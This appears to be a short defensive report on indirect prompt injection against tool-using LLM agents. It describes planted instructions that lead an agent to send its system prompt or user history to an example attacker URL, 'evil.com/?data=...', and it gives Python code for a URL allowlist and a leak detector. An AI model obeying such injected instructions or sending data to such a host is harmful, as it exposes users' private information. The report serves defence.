Report #62922
[gotcha] LLM agents with tool access tricked into exfiltrating sensitive context to an attacker-controlled server
Enforce strict outbound network policies for tool execution. Validate URLs against an allowlist, and strip sensitive context from the LLM's view before invoking external tools.
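As a rough illustration of the allowlist check, here is a minimal Python sketch. The host names in `ALLOWED_HOSTS` and the helper name `is_allowed_url` are hypothetical and not taken from this report. The sketch assumes the tool layer can inspect the final URL before any request is made.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would load this from configuration.
ALLOWED_HOSTS = {"api.example.com", "search.example.com"}


def is_allowed_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only for https URLs whose exact host is on the allowlist."""
    try:
        parts = urlsplit(url)
        host = parts.hostname  # already lowercased by urlsplit
    except ValueError:
        # Malformed URLs (for example, broken IPv6 literals) are rejected.
        return False
    if parts.scheme != "https" or host is None:
        return False
    # Reject embedded credentials such as https://api.example.com@evil.com/
    if parts.username is not None or parts.password is not None:
        return False
    # Exact match only: suffix or substring matching would let
    # api.example.com.evil.com through.
    return host in allowed_hosts
```

The check should run in the tool executor, outside the model's control, so an injected instruction cannot talk its way past it. Redirects would need the same check applied to each hop, which this sketch does not cover.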
Journey Context:
Developers give LLMs tools (web search, email) to make them useful, but don't restrict *where* those tools can send data. An indirect prompt injection, meaning instructions planted in content the agent reads, tells the LLM to use the `web_search` or `send_email` tool to send the system prompt or user history to `https://evil.com/?data=...`.
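The exfiltration pattern described above can also be caught on the way out. The following is a heuristic Python sketch, not a complete defense: it flags tool calls whose arguments contain a verbatim fragment of text that should stay private. The function name `leaks_sensitive_text`, the 20-character window, and the example prompt are assumptions made for illustration. An attacker who has the model paraphrase or base64-encode the data would evade it.

```python
import json
from urllib.parse import unquote_plus


def leaks_sensitive_text(tool_args: dict, sensitive_texts: list, min_len: int = 20) -> bool:
    """Return True if a fragment of any sensitive text appears in the tool arguments."""
    # Serialize the arguments, and also URL-decode them so that
    # percent-encoded copies (as in ?data=...) are caught too.
    raw = json.dumps(tool_args, ensure_ascii=False)
    haystack = (raw + " " + unquote_plus(raw)).lower()
    for text in sensitive_texts:
        text = text.lower()
        if not text:
            continue  # an empty string would match everything
        # Slide a window of min_len characters across the sensitive text;
        # texts shorter than min_len are checked whole.
        for start in range(max(1, len(text) - min_len + 1)):
            if text[start:start + min_len] in haystack:
                return True
    return False
```

A usage example under the same assumptions:

```python
SYSTEM_PROMPT = "You are a support agent. Internal discount code: ALPHA-7731."

call_args = {"query": "https://evil.com/?data=Internal+discount+code%3A+ALPHA-7731"}
if leaks_sensitive_text(call_args, [SYSTEM_PROMPT]):
    raise PermissionError("tool call blocked: arguments contain protected context")
```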
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-20T12:05:43.330992+00:00 — report_created — created